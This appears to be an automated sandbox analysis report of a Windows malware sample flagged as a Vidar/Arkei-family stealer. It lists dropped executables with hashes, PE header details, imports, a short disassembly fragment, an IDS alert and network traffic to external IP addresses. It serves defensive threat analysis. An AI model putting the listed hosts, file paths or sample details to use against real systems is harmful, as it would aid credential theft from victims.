SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\7791.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5D03.dll

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	929792
Entropy (8bit):	7.885022709826204
Encrypted:	false
SSDEEP:	24576:IWHEByEj+Ppqce7TA598UZHd7i/mhd6q6KdP5u+WmlqdWe:5HYDIqc138OI/ycKZ5nlqdWe
MD5:	7328EB5E04A2353DB8109194BFB99935
SHA1:	F0A0259B23C27B11E8E7DC8CBD3214E1F33E0371
SHA-256:	0D3333C132D135187EA22F91CAEF4B83EA3DE70867AB53CD29CD79E9D7038E1F
SHA-512:	15CAD4B1DD80E4539EFFF568B2A8C75A944AAA7D900F34014124896B3101713414CAB83F8D1C8EA8F93AF369C9BFBAFD1DB20EE007C0C16A4ECADAE682FE1BF9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 28%
Preview:	MZ......................@...................................\...........!..L.!This program cannot be run in DOS mode....$.........F.W.(.W.(.W.(.ZL..q.(..@-.H.(.p...B.(.Tf....(.9C-.X.(.p.E.;.(.......(.W.)...(.G..(.(.L.....(.L...s.(.9C).F.(.9C*.4.(.G,...(.z(.Z.(.p...y.(.....p.(.ZL..G.(.RichW.(.....................................................PE..L......A...........!.....p..........0.............@..........................0......P0..................................................@........................8..................................................................................text...`c.......p.................. ..`.rdata..'........ ..................@..@.data....J.......P..................@....crt................................@....rsrc...@..............................@.reloc...@.......P..................@..B....................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7791.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402944
Entropy (8bit):	7.3124576176374445
Encrypted:	false
SSDEEP:	12288:GvzG5E5TCKXsC99XKiQdfHbKJdY5Vfs75:0GKXsY9Hu6dYPs9
MD5:	5AD1BEF6F9DF3C527F7217DCCD26C2D5
SHA1:	0C9F7020681D0A9629855AB26EFCC20D0FB2C2FE
SHA-256:	435019B4259F0F615A42F1D40261F98A3581F2BD46C2D108D315B25BCF18D788
SHA-512:	31D3A42B8CDC5F5B4A7F71B710F33A47B8FA0893D20B350AC6DE18EFA6F6A9CB593CC78519342B4D493CC662E70BF25ACEAC773AECDA98548C5237A21E7830C2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 69%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_"..>L.>L.>L."q..>L.l..>L.l...>L..7.>L.>M.N>L.l..>L.l..>L.l..>L.Rich.>L.........PE..L.....i`......................r..... .............@..........................Pu.................................................(.....u.x>..........................`...............................0...@............................................text............................... ..`.data...(.q.........................@....hususe.K.....t.....................@....lutoluhJ.....u.....................@....rsrc...x>....u..@..................@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\900B.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	6.8244721138511935
Encrypted:	false
SSDEEP:	6144:wlUnVkNs6JhgL16yz9ztEyrbRmq1We5mmXbv9KDyL2d:wlYis64h6yz93RmqlmeblYH
MD5:	E1806DF573470FC02E4271A8AA1E9D95
SHA1:	11EACA12AB368F308C673C5CE2FEA764658059E6
SHA-256:	44D908E94E171FD66A4F16F7714BC1EF8A4689B96E51520C7B2C8BC168BD4C7F
SHA-512:	9033BE6E10FC47B4E83AEEB7886A4ED95A1BE5BE5FE37EC366EF2FA26BAC562C744209CC4D8C0632329D154E1CEE71D1C533F32DCFFC7303BE48D52E49AB1169
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.O...!...!...!.....!......!.....!.0CZ...!... ..!....).!......!......!.Rich..!.........PE..L....fC`......................p...................@...........................s......^..........................................(....@s.x>..........................p...................................@............... ............................text...N........................... ..`.data...H.p.........................@....kulo...K.... s...... ..............@....lisik..J....0s......"..............@....rsrc...x>...@s..@...$..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\efthhbi

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	6.8244721138511935
Encrypted:	false
SSDEEP:	6144:wlUnVkNs6JhgL16yz9ztEyrbRmq1We5mmXbv9KDyL2d:wlYis64h6yz93RmqlmeblYH
MD5:	E1806DF573470FC02E4271A8AA1E9D95
SHA1:	11EACA12AB368F308C673C5CE2FEA764658059E6
SHA-256:	44D908E94E171FD66A4F16F7714BC1EF8A4689B96E51520C7B2C8BC168BD4C7F
SHA-512:	9033BE6E10FC47B4E83AEEB7886A4ED95A1BE5BE5FE37EC366EF2FA26BAC562C744209CC4D8C0632329D154E1CEE71D1C533F32DCFFC7303BE48D52E49AB1169
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.O...!...!...!.....!......!.....!.0CZ...!... ..!....).!......!......!.Rich..!.........PE..L....fC`......................p...................@...........................s......^..........................................(....@s.x>..........................p...................................@............... ............................text...N........................... ..`.data...H.p.........................@....kulo...K.... s...... ..............@....lisik..J....0s......"..............@....rsrc...x>...@s..@...$..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hcthhbi

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	289792
Entropy (8bit):	6.455919063315403
Encrypted:	false
SSDEEP:	6144:ptL+f09fHP2KWMIbs7RO9xvfMzZ+OhwaukqC37pIZq:pN59/eyIbwO9xunVWq
MD5:	F3AF35C6E121FF8FE96B0794E6F72D6B
SHA1:	D9143EDEE2471A8205EDADB5BF532BFF3D9A88AA
SHA-256:	CEF4F5F561B5C481C67E0A9A3DD751D18D696B61C7A5DAB5EBB29535093741B4
SHA-512:	566AA1C318708684332A37F41A8A211B761665EA09F73CF52CE26A0A81F1BC44ADF820148FB890968EC8202C384CD6D10084B1B74B20DEE1E12EA14FE63DB4F4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.]....2.....2....2.....2..sI..2..3.?.2.....2.....2.....2.Rich.2.........PE..L.....a..........................................@.........................................................................`...(.....................................................................@...............8............................text............................... ..`.data...............................@....tixuz..............................@....luka...K...........................@....mavaf.."...........................@....rsrc..............................@..@........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hcthhbi:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\tceveei

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	248375
Entropy (8bit):	7.999245551244514
Encrypted:	true
SSDEEP:	6144:mQgfuIf3cUV/r2TODCt+cVaIdSOaGXyanP:7KuGMUV/r2iDCt+cVa4xyaP
MD5:	B576ED4786293C207FD14DAC61884835
SHA1:	B7B04B13F2A54F85A90F5EC598D95D59AE9C7E9A
SHA-256:	634B9BFC846CCF83D62400366D88EE78636B2E9C168A8A37A3BBF46AC61C9B0C
SHA-512:	022310173A5E6985253F659E4276A735E220555B39323CA74D63420B05359AA2E384F40711770E1E9F18FB5834092C772270045BE1A20061A68BF743284212B7
Malicious:	false
Preview:	gSLU^..-..r.?....i. u.,..q.,....`......\|@F.W...E..C.....D..H..@...Hs.....^.8r....TL.y.an..d.:...<..,.....f.t....h6...O...6......F.....xK..`>.L Z.O...e.......f6.}.4-..yK.%..,A .w .....6..1.en.e3bE..A...2.\|6.B.,.=?.C]..V..._.U...W...3K..)..F_$30.P23@a;r....,.$}.8.D8....4.....=....@.H...l.z.c..@[..-.:..1....v.......=R.Q.ar.F..Z.....~w..M#_.r..G.,`..;.k...O\|.A4..I.w.rY..7.m..-....([......r..8..W....m.........Lr.4..P.JM...."r`.........e}....BU.6.......#.Tu.&....e.p)%.....#G.....8..o....!.*.R...'Q1...Z._..b...9.+h........l.#;.-..-S....!.x.c.uz])...@.9.%A..\'.N..-l.x...'...7.@z...<...q...N..?....1..,.Y..8...R....Ce.}.#.K.....n.0r.....`.s..%J...,.&x...wGu.r..r.qNH..ZUT...aw.`...tv....G.f.oi..Gy..)..x/.....?TTl.b4=.,l..J2..5..].#.e..G....x.3AQv....m<.\f.X..'u...i[....<ZrZOd..@.]../.&...RU.s.......!..$...6.-(.u.#.j....5<..o...0-.y"...f....Es.0G..,w....5..."...\q....b..C..Hq........_....G M.U`.J...S...z...o...u....<._..aC.k.!D.).".Pm1#..6P

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.455919063315403
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hOdgEiePTe.exe
File size:	289792
MD5:	f3af35c6e121ff8fe96b0794e6f72d6b
SHA1:	d9143edee2471a8205edadb5bf532bff3d9a88aa
SHA256:	cef4f5f561b5c481c67e0a9a3dd751d18d696b61c7a5dab5ebb29535093741b4
SHA512:	566aa1c318708684332a37f41a8a211b761665ea09f73cf52ce26a0a81f1bc44adf820148fb890968ec8202c384cd6d10084b1b74b20dee1e12ea14fe63db4f4
SSDEEP:	6144:ptL+f09fHP2KWMIbs7RO9xvfMzZ+OhwaukqC37pIZq:pN59/eyIbwO9xunVWq
TLSH:	73547D30AAB0C035F5B711F4497983697D297EA36B2451CB62D636EEA6347E0EC3035B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\...2...2...2.].....2.......2.......2.......2..sI...2...3.?.2.......2.......2.......2.Rich..2.........PE..L......a...........

File Icon


Icon Hash:	9066e190e6673146

Static PE Info

General

Entrypoint:	0x40a190
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x619DDEA1 [Wed Nov 24 06:41:37 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	57832fbf5050813adc73eaabe334c13c

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007FAC484F019Bh
call 00007FAC484E64E6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 00428E40h
push 004127C0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF94h
push ebx
push esi
push edi
mov eax, dword ptr [0042B108h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
mov dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0040125Ch]
mov dword ptr [ebp-04h], FFFFFFFEh
jmp 00007FAC484E64F8h
mov eax, 00000001h
ret
mov esp, dword ptr [ebp-18h]
mov dword ptr [ebp-78h], 000000FFh
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, dword ptr [ebp-78h]
jmp 00007FAC484E6627h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007FAC484E6664h
mov dword ptr [ebp-6Ch], eax
push 00000001h
call 00007FAC484F0B8Ah
add esp, 04h
test eax, eax
jne 00007FAC484E64DCh
push 0000001Ch
call 00007FAC484E661Ch
add esp, 04h
call 00007FAC484ED5D4h
test eax, eax
jne 00007FAC484E64DCh
push 00000010h

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x29560	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7f000	0xb9e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1380	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x87d8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x338	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29898	0x29a00	False	0.4020094313063063	data	5.96699973231147	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2b000	0x50c00	0x10e00	False	0.9338541666666667	data	7.796621676438545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tixuz	0x7c000	0x5	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.luka	0x7d000	0x4b	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.mavaf	0x7e000	0x22	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x7f000	0xb9e0	0xba00	False	0.44802167338709675	data	4.699362788784552	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x88b38	0x2	data	Uzbek	Italy
AFX_DIALOG_LAYOUT	0x88b40	0x2	data	Uzbek	Italy
RT_CURSOR	0x88b48	0x130	data	Uzbek	Italy
RT_CURSOR	0x88c90	0x130	data	Uzbek	Italy
RT_CURSOR	0x88dc0	0xf0	data	Uzbek	Italy
RT_CURSOR	0x88eb0	0x10a8	dBase III DBT, version number 0, next free block index 40	Uzbek	Italy
RT_ICON	0x7f700	0x6c8	data	Uzbek	Italy
RT_ICON	0x7fdc8	0x568	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_ICON	0x80330	0x10a8	data	Uzbek	Italy
RT_ICON	0x813d8	0x988	dBase III DBT, version number 0, next free block index 40	Uzbek	Italy
RT_ICON	0x81d60	0x468	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_ICON	0x82218	0xea8	data	Uzbek	Italy
RT_ICON	0x830c0	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 11260065, next used block 10662290	Uzbek	Italy
RT_ICON	0x83968	0x6c8	data	Uzbek	Italy
RT_ICON	0x84030	0x568	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_ICON	0x84598	0x25a8	data	Uzbek	Italy
RT_ICON	0x86b40	0x10a8	data	Uzbek	Italy
RT_ICON	0x87be8	0x988	data	Uzbek	Italy
RT_ICON	0x88570	0x468	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_STRING	0x89f88	0x3b6	data	Uzbek	Italy
RT_STRING	0x8a340	0x562	data	Uzbek	Italy
RT_STRING	0x8a8a8	0x138	data	Uzbek	Italy
RT_ACCELERATOR	0x88a88	0x70	data	Uzbek	Italy
RT_ACCELERATOR	0x88a50	0x38	data	Uzbek	Italy
RT_GROUP_CURSOR	0x88c78	0x14	data	Uzbek	Italy
RT_GROUP_CURSOR	0x89f58	0x30	data	Uzbek	Italy
RT_GROUP_ICON	0x889d8	0x76	data	Uzbek	Italy
RT_GROUP_ICON	0x821c8	0x4c	data	Uzbek	Italy
None	0x88b08	0xa	data	Uzbek	Italy
None	0x88b18	0xa	data	Uzbek	Italy
None	0x88af8	0xa	data	Uzbek	Italy
None	0x88b28	0xa	data	Uzbek	Italy

Imports

DLL

Import

KERNEL32.dll

GetFileSize, lstrcmpA, WriteConsoleInputW, TryEnterCriticalSection, WritePrivateProfileStructA, GetConsoleAliasesLengthW, CopyFileExW, SetComputerNameExA, GetDriveTypeW, MoveFileExA, DebugActiveProcessStop, lstrcpynA, GetConsoleAliasExesLengthA, FindResourceW, BuildCommDCBAndTimeoutsA, LoadResource, UpdateResourceA, InterlockedIncrement, _lwrite, GetQueuedCompletionStatus, VerSetConditionMask, ReadConsoleA, InterlockedDecrement, ZombifyActCtx, WritePrivateProfileSectionA, SetDefaultCommConfigW, GetSystemWindowsDirectoryW, GetNamedPipeHandleStateA, GetProfileSectionA, SetConsoleScreenBufferSize, InterlockedCompareExchange, WriteConsoleInputA, GetComputerNameW, ConnectNamedPipe, GetModuleHandleW, GetTickCount, VirtualFree, GetConsoleAliasesLengthA, GetDllDirectoryW, GetPrivateProfileStringW, GetConsoleTitleA, ReadConsoleOutputA, GetConsoleAliasExesW, GetDateFormatA, GetCommandLineA, CreateActCtxW, EnumResourceTypesA, SetProcessPriorityBoost, GetDriveTypeA, GetPriorityClass, GetVolumePathNameW, GlobalAlloc, GetPrivateProfileIntA, GetSystemDirectoryW, SetFileShortNameW, LoadLibraryW, CopyFileW, AssignProcessToJobObject, GetCalendarInfoA, ReadProcessMemory, GetSystemWow64DirectoryW, SetSystemTimeAdjustment, GetSystemWindowsDirectoryA, FormatMessageW, GetVersionExW, GetFileAttributesA, SetConsoleMode, GetConsoleAliasW, GetWriteWatch, VerifyVersionInfoA, WriteConsoleW, GetBinaryTypeA, TerminateProcess, GetAtomNameW, GetMailslotInfo, GetCompressedFileSizeA, GetTimeZoneInformation, CreateFileW, GetOverlappedResult, GetACP, lstrlenW, FindNextVolumeMountPointW, CreateMailslotW, DeactivateActCtx, GetNamedPipeHandleStateW, GetConsoleAliasesW, ReleaseActCtx, SetCurrentDirectoryA, GetStartupInfoA, GetCPInfoExW, FillConsoleOutputCharacterW, GetHandleInformation, GetLastError, GetLongPathNameW, ReadConsoleOutputCharacterA, CreateNamedPipeA, EnumDateFormatsExA, CreateTimerQueueTimer, WriteProfileSectionA, SetComputerNameA, VerLanguageNameW, GlobalGetAtomNameA, DefineDosDeviceA, ResetEvent, OpenWaitableTimerA, GetLocalTime, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, SetCalendarInfoW, WritePrivateProfileStringA, MoveFileA, SetConsoleOutputCP, GetExitCodeThread, AddAtomW, GetProfileStringA, HeapLock, GetCommMask, HeapWalk, GetTapeParameters, FoldStringA, SetSystemTime, GlobalWire, GetModuleFileNameA, GetPrivateProfileSectionNamesA, GetOEMCP, FindNextFileA, EnumDateFormatsA, CreateIoCompletionPort, FindFirstChangeNotificationA, lstrcatW, FreeEnvironmentStringsW, FindNextFileW, GetStringTypeW, BuildCommDCBA, VirtualProtect, OutputDebugStringA, SetThreadAffinityMask, EndUpdateResourceA, GetVersionExA, GetVersion, DeleteFileW, GetCurrentProcessId, MoveFileWithProgressW, GetFileInformationByHandle, DebugBreak, FindActCtxSectionStringW, SuspendThread, lstrcpyA, SetUnhandledExceptionFilter, WideCharToMultiByte, GetStartupInfoW, HeapValidate, IsBadReadPtr, RaiseException, Sleep, GetProcAddress, ExitProcess, WriteFile, GetStdHandle, GetCurrentProcess, IsDebuggerPresent, GetModuleFileNameW, GetCPInfo, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, SetLastError, EnterCriticalSection, LeaveCriticalSection, RtlUnwind, DeleteCriticalSection, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetEnvironmentStringsW, GetCommandLineW, HeapDestroy, HeapCreate, HeapFree, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, InitializeCriticalSectionAndSpinCount, SetFilePointer, GetConsoleCP, GetConsoleMode, OutputDebugStringW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetLocaleInfoA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, FlushFileBuffers, CreateFileA, CloseHandle, DeleteFileA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Uzbek	Italy

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
159.69.101.170192.168.2.380497922035911 06/29/22-23:12:20.334596	TCP	2035911	ET TROJAN Vidar/Arkei/Megumin Stealer Keywords Retrieved	80	49792	159.69.101.170	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 29, 2022 23:11:06.656097889 CEST	49755	80	192.168.2.3	185.237.206.60
Jun 29, 2022 23:11:09.681504011 CEST	49755	80	192.168.2.3	185.237.206.60
Jun 29, 2022 23:11:15.697705984 CEST	49755	80	192.168.2.3	185.237.206.60
Jun 29, 2022 23:11:19.209732056 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:19.427191019 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:19.427377939 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:19.427874088 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:19.427916050 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:19.963665962 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:20.049396992 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:20.987431049 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:22.387376070 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:22.411546946 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:22.411701918 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:22.416168928 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:22.441237926 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:22.441378117 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:23.204335928 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:23.204457045 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:23.642194033 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:23.668878078 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:23.669043064 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:23.693659067 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:23.693733931 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:23.717437029 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:23.717550993 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:23.741122007 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:23.741247892 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:23.770092964 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:23.770242929 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:24.921134949 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:24.947093010 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:24.947213888 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:24.968178988 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:25.047118902 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:25.047230959 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:25.071088076 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:25.071299076 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:25.146245003 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:25.292295933 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:26.242126942 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:26.266073942 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:26.266139030 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:26.290096045 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:26.401756048 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:26.545770884 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:26.554064989 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:26.554167032 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:27.459332943 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:27.534239054 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:27.534327984 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:27.548000097 CEST	80	49756	195.158.3.162	192.168.2.3
